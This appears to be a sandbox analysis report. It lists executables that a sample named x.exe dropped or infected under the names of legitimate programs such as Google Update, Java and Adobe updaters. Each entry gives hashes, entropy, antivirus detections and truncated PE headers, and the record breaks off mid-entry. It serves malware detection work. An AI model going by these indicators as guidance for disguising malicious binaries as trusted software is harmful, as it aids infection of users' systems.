                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):165976
                                      Entropy (8bit):6.135299341821214
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCovkvQ4gXIRSG+7IJqC3CJyoDjpBnjkP0XGx2SYg+b/Q+y1s3:PugnGZLknnj1X62SYdb4I
                                      MD5:BA8EA53268BDE311893484210DB5D175
                                      SHA1:CED5F2D8D56A2E35FC12722ADA4B6F89D2D18987
                                      SHA-256:11B0A81DF6BB3DF63262042E1D7ACC55B057B44C9264B60F5F145A98E0FB966D
                                      SHA-512:B8708FB369CAD49A0B1A804C3D0E098CBD1E3B67A37D5249D84F95A29CD07381BEBEE5E81D6AC9E3B4125A784550DBE2292540CD8561321D70B3C5514AEF87C3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1113176
                                      Entropy (8bit):6.446467711397749
                                      Encrypted:false
                                      SSDEEP:24576:kTC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBg:k+6AqSPyC+NltpScpzbtvpJoMQSq/jrL
                                      MD5:7EED01A3E7667D1DC5E9A8F19C31A4D3
                                      SHA1:ABD806F0580C5B56BE794BFE44650D7641A6D71A
                                      SHA-256:31F7CDBC86FF5CBB03CB43D30F13DC8280997AB285BDACA68BE731BC82C5C1FC
                                      SHA-512:00949C67DA8561B33FD6D7B83FDDAB5B2340604FDA26737F9F24858A29D1DD54984B67EE4F25505477C4E30150EF62192515656EB70F4430E9B82E08358CFBE8
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2414080
                                      Entropy (8bit):6.728757078944773
                                      Encrypted:false
                                      SSDEEP:49152:G1GSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL8:s4OEtwiICvYMpfc
                                      MD5:8CD88B0C755A7E8D9E072BE4DAF2BE25
                                      SHA1:0AE0551EBC89A6B88515B12F2AD4171FFDA9ACC4
                                      SHA-256:6BE9791EF08C87545F7EDD41B70880640C568EA1A5DD2EE76CDE400D6F722552
                                      SHA-512:84041FFA70DB1A3057B423D4F693E165C6B8F927C2FA9AE58323C5B3D887EDE5E4EFEC3E49784C19C410D58EFF77F4F04F69468A7D941AAE68599034654C821E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\Uninstall.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):113233
                                      Entropy (8bit):6.7789810493984115
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCFCrMGEtajbefY/TU9fE9PEtuGCrK:PuFCrfEt+cYa6YCrK
                                      MD5:0FF71A744E70F7F7E1CE56FC4298E688
                                      SHA1:939DEB068D6BCB5BAB11AF96CF6040F26B5EDB8B
                                      SHA-256:3214538D265FB6BFB3A0620229FCD979A0225C0477F0FE0578FB443AE7EC4FDA
                                      SHA-512:0037311257AFC9CFC0E6C1439AFC8E9B9BC83CF19D7E9FF7D24292A37917F56CC95071ACF4909D4FD869C2FB4D596FBABB9CF97C7591DB079549A401132372DB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):409608
                                      Entropy (8bit):6.460025563791325
                                      Encrypted:false
                                      SSDEEP:6144:PuTvqF1Ged2RYbguEuFuTkdj+zRGa7JkjrXyPyMMWvpBVOaqahUqjAGT:TbgvuFuQdj+zRTJkX8yMhB3jhBAi
                                      MD5:83769C80EE264331DD46FBBBDB682CC9
                                      SHA1:F3921FFA18C7B93A262A79C1C7A1A60A88D0CBC1
                                      SHA-256:4D81853DFC97E32B2F03E4C1F75F41C91FD3DF73FB80B23A59484E2EEB9C264F
                                      SHA-512:BADED7629C0D0C40AA785AE0FFCD8D0D7037B050199B517F5BC230C6954FE7ED52E911414CB829A509966AB82CC2CD5DD8868449D2EC9E567141E9A3138C3AF4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      • Antivirus: Virustotal, Detection: 89%, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):214512
                                      Entropy (8bit):6.488889881948425
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCDGnUI/9FXK4+PoSZSb5qURwubvvnzdl1CkTlxAenDl3SoxceC76JNKjzc:PuDGUcsvZZvUmubv7hTHA8l3yROJyDI5
                                      MD5:F085722D23BDED9EB6D55AE1232725CC
                                      SHA1:19C09DFC582FE436B06B536DAC110E26F596FCC2
                                      SHA-256:60EAEFFA9F5182AAFAD9D945DC601590A92782AA102AEF9AE10E19088E7C6179
                                      SHA-512:5BDDCC02CB2D9B0B7270D3D1F1387F94A14047CCAC7810CEEBDE8357A7B2C4D5F79BDA3902CDA2BB5E25558D0D0FA44AFF3DD5846D45AD380FC58CAB364DDDD1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      • Antivirus: Virustotal, Detection: 90%, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):568400
                                      Entropy (8bit):6.67219335276453
                                      Encrypted:false
                                      SSDEEP:12288:lyvTCXdXikLj2jR7trg6Qi3vYsKTU00vq:lyyLj8trn3wsq0vq
                                      MD5:B41B153CA4DFE9D557899142C6FDD767
                                      SHA1:D7310F560839E21A7968DA46E27231290B25A312
                                      SHA-256:FC1577451D4743DBE1B27A1828EA536522CF5C9CBE952A48F58345F53A85D72A
                                      SHA-512:8CE84911CA279CCB86E8D4398CEC16B00E9E29FDF25F766FC0792E71154B2A8FBC22CC8F69387A6F5EC5992AC264556A39C1B9AD940F2AA674538DC4F50502D6
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      • Antivirus: Virustotal, Detection: 90%, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1252432
                                      Entropy (8bit):6.763252873451025
                                      Encrypted:false
                                      SSDEEP:24576:d0n7Ubxk/uRvJqLGJLQ4a56duA/85RkV4l7/ZeoMOp:m4iwwGJra0uAUfkVy7/ZX
                                      MD5:9F7E59075683E964E4D6DF66A92AAF0B
                                      SHA1:60EE788C42034ECE4FDB47C325E4EC2BC9DF67AA
                                      SHA-256:D5759CFE49A74CAA1A6A7FA8DB17DE9D570F1BE8DA9FE75AB48E67076ECFF8E1
                                      SHA-512:077D5D9FE8102144D458283ED099DC5C2F51F90B0ECE7DABB0BDA66E9B97F6D12A83527067877A802C0AD46DA974C494DD5EF954AC494D0838DAC87ACF06BADD
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):790096
                                      Entropy (8bit):6.745221507787877
                                      Encrypted:false
                                      SSDEEP:12288:bMvcR0D0B6PyxoxIlZwM+R6R4uFjs1Z7FMN0TzJqccvbXkN58AuimIh:/R0gB6axoCfyR6RLQRF/TzJqe58BimIh
                                      MD5:ECF5236F6653F2D0F55FB26B2ABE3D4F
                                      SHA1:60AC40919543275E088CE78F063DBA998964DFF7
                                      SHA-256:273F4F789C6DAB5593C5273845020DC3E172C98833E38729C9DA159C53AE5623
                                      SHA-512:06F844A46C9AE9B4588C167F809A1023DC88CE7853C61D1DE92841ADC7128C91CB0EC5B5F32E7E6E86C5B81D3161915767F98CF090AF19F6BE680FC1347255DC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Virustotal, Detection: 93%, Browse
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):562776
                                      Entropy (8bit):6.433164069541556
                                      Encrypted:false
                                      SSDEEP:6144:PuJ0dzerObMhDGJ9UM3sunrXj9BMHmD1tYFLqY/W5R02qO7VKCy7KCzDSEBPj:BeqbWqB3sunrT9+aYFLq3ny7JSEBPj
                                      MD5:8DA8BD2BDE4B0EEAA83DD9B17289F169
                                      SHA1:284502E7ABD3A84AF988CC6D2F4EA87D08D027B6
                                      SHA-256:794C922912321E663916EBF1B11646CE10DBC0842E0FF68571770672FCFAB214
                                      SHA-512:63EEE0EEFC46141F7B94DA48F420326630C9182E4C9CEB44104CE7302832A7219D361F2F61D52CD83B9E1E81CAC1ED86C8C44C8CE805299ABA74A7FA81D235D9
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):127512
                                      Entropy (8bit):6.330981765539028
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCsPo10JOSdnvEhEyr1hg9uCRFRzsxeZ:Pusg1MOc81hmRFJs0Z
                                      MD5:A70C749F32B95B9C01A9919E8F96205D
                                      SHA1:7A43A28D2FCDBF663B4D61E969CD6160F1A444AC
                                      SHA-256:39C83EC2727FFCC589106D1AD4C7BE154C7752382C958252FF510A61F65E24C2
                                      SHA-512:1341ADCD4FEDA85A9425348310A2FA86A1D9AFA705ABFF7FCA2C39FDDFA9C3176239BB87553216743DCBB662211DB0E3C90B644A3CC8DEBE80CD38BBE7ACBAE7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      • Antivirus: Virustotal, Detection: 89%, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.7881128883409
                                      Encrypted:false
                                      SSDEEP:6144:PuGXLYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:xXEbH0j4x7R6SvyCMqn
                                      MD5:BB745A9E59BFDC3FED3D6ACC5EB1969E
                                      SHA1:B569EF5567BF533C49F4C59441D1881726DEA540
                                      SHA-256:5C257F423AFD510D6EE9EAB80273CC673995F966932466C9AD74EB2AA613A892
                                      SHA-512:B43198FC36F9DECB3767E6888B632093550394DF5D5826540A0BBDAE711931F595B398CE59C5F4676C1FDA7953C0702D57CC98D3E18309DEA517C536AB63CCCD
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      • Antivirus: Virustotal, Detection: 89%, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.790537251287294
                                      Encrypted:false
                                      SSDEEP:6144:PuGkXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:xkXCs/YAh/elvhI7Wd
                                      MD5:57150329C07A1CCA1C715687BBD681A0
                                      SHA1:EA1805323441B728107A98C5C88EB1609116F70E
                                      SHA-256:AFB4A253B3CFEFB7FA8C8AAB7FE10060AF5A33C10147EDBA4501C5089F407023
                                      SHA-512:2BD0008D28BDBBBDB0F6A8D01121FFCF9A6AD18147110F100D1EB3CD7B93EC3481F8D0358E427F94D53F01764B246C54FC49F57CFDBAB1831672218197DFC444
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):437888
                                      Entropy (8bit):6.42435194722595
                                      Encrypted:false
                                      SSDEEP:12288:xXNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:hKiBLZ05jNTmJWExixM
                                      MD5:E96B5A5F7432CF95AC667CC32CAB7CE1
                                      SHA1:F5729409A0AD909360DD9938FE05681E8C98BEA7
                                      SHA-256:22345B680E235E582820160A73A5221A98550D7947DC1F22FE768C51788B3614
                                      SHA-512:BF03F48889EA86C4C39B32B32760FE57293D85C5E6A88D3695CF4D7F7AB23B3F4ED07588987619B084AFFB51A61B3C7404E2D8177A29EC4AF343FCBD66F7C560
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):343328
                                      Entropy (8bit):6.643174471027498
                                      Encrypted:false
                                      SSDEEP:6144:PutkTpB8HHvBjruphfgesnAhAOQp2EwckjQx+m8zhPLlZp3:GklinJruphfg26p2Ewix+m8Nln3
                                      MD5:C6DCB652B36FD0F69EF1C6C28C3F3D3E
                                      SHA1:B9FA38B704D6BDDA1E203422207E09D2FB49C216
                                      SHA-256:A2D68D17A3E61E41CD6E9389058D6A36036BEC91AFD4CF6A2F587FAF0CDCDD5B
                                      SHA-512:1B184AC17FDD6F28956F619CD772697EEA6684C70B4E74222BD75C58ACFF62C1BF66D9AFB840A9735A0BACD3792405E063701AA29C909EFB5F3B6DF5AF284FB3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):443680
                                      Entropy (8bit):6.396943856678141
                                      Encrypted:false
                                      SSDEEP:12288:z3gaHC2zUM2WJoROZVXk8hbodzbaw8x0Cx+wnx:zx5k8hb0Haw+x5x
                                      MD5:689EC8C9ABDBA5399058B31A494353E7
                                      SHA1:2940C3D9852341884ED269B06804C0383F9A6056
                                      SHA-256:B168963DD38A08EE00E540180FF0BB2480E72D6439C6F3E386BFDEACCC725F95
                                      SHA-512:AE28934023D46D5D36A894F31A0A2232DF9D968B20D7176BCD37058C13FE9B1BA41387CEBBE824BC6FAFF0ECB35354C1A69C585BC39A4468B713B9F458CCB107
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):203552
                                      Entropy (8bit):6.1311659126541285
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC6aKavT/DvbEvK9aobNI2B+Nl4jz+b0atWH1TmFtotpcat8iKdlVST31Oa:Pu6aK2h9H/B+rEtiPC
                                      MD5:5C85C6CF32D2443AE5A7E4FAD8CB7CCF
                                      SHA1:D23CB4A5961CD7B7C4DA100EBE98E5A4CB8B2FCF
                                      SHA-256:4EBA2A6D96466D63B206E0760B4E9319D26B4458A8F030460DDE896AAF227682
                                      SHA-512:FBC3D48FCF80DBAA328DCDF326638C57CEF445A31FA269AF6D47BFC03E112BCD0143721C78F041A3D1C7AEAF44BE135484B33D170AA1EA550CFE5AB15242F694
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):149792
                                      Entropy (8bit):6.503976503009816
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC/4vzT+PjZpsB+2h+EOXkMxJ7Rfp8K172YPrp:PulpsB+09zMH7cCxPd
                                      MD5:EAAD727FE492030433EBADE57325EA69
                                      SHA1:6008DE3C0DD2203E737A68ADB562A81DE1BD4349
                                      SHA-256:8294521F6F0C2936F76C92743BF193937619C13FC0CFCBE2DA1238605D07F79B
                                      SHA-512:803E85A412536591F05DC3C6065B84919B11460AD08DD8F5833E47C9FFA00E1D33DE6092658D219C819220B867CEFFFBED8BAF822E372E95CBD8D48AD9351DE7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):227104
                                      Entropy (8bit):6.2330769171298925
                                      Encrypted:false
                                      SSDEEP:6144:PuKWt9h8QlLISZWVRohcq7dvni3F8QrBA/:by9hdFIdRoGUxi35rBU
                                      MD5:19E917EB830D0429C0E2E8F64114212B
                                      SHA1:5351AA18D019E6ED9123460431B4B28A0187A065
                                      SHA-256:6133D3AF6F4C30C1337C63B71947056FB3A46E2A269EB4F2E996E53DD8E95754
                                      SHA-512:A5CFFE837ADAC6B05C3D4F413C9461BD368A7CAFC3142DD5472BE292F1D17FB74571BC05FC8204F0781138016D76085DB843EEFC787033984FB42546F8DF24D3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):264480
                                      Entropy (8bit):6.638998317491867
                                      Encrypted:false
                                      SSDEEP:6144:PumwCtJmRqyFmB6AOKmiMGwIAfx+iQ+FfFyLgG1da6edo:tw6JmRI6Bitwpx+iQafFykG1da6edo
                                      MD5:CC6410226CC9A5A311864C905A41F69D
                                      SHA1:C2E9C75DC6382238B2D7697576C5BB47A09AA1EF
                                      SHA-256:6118343C2990A8414501F08A6FC70E2888E8CDC193054E0410D5B5FF3EF63898
                                      SHA-512:DAE7626F1BFADCE4E9108CC20FBF84D5F86D1E9EBF7AA58B6386613C52718AF2C91ABFDD539F87297DBC2A5FB486619F4048FC831B96DC4AD924C61785AFA6AB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):149792
                                      Entropy (8bit):6.504334063798769
                                      Encrypted:false
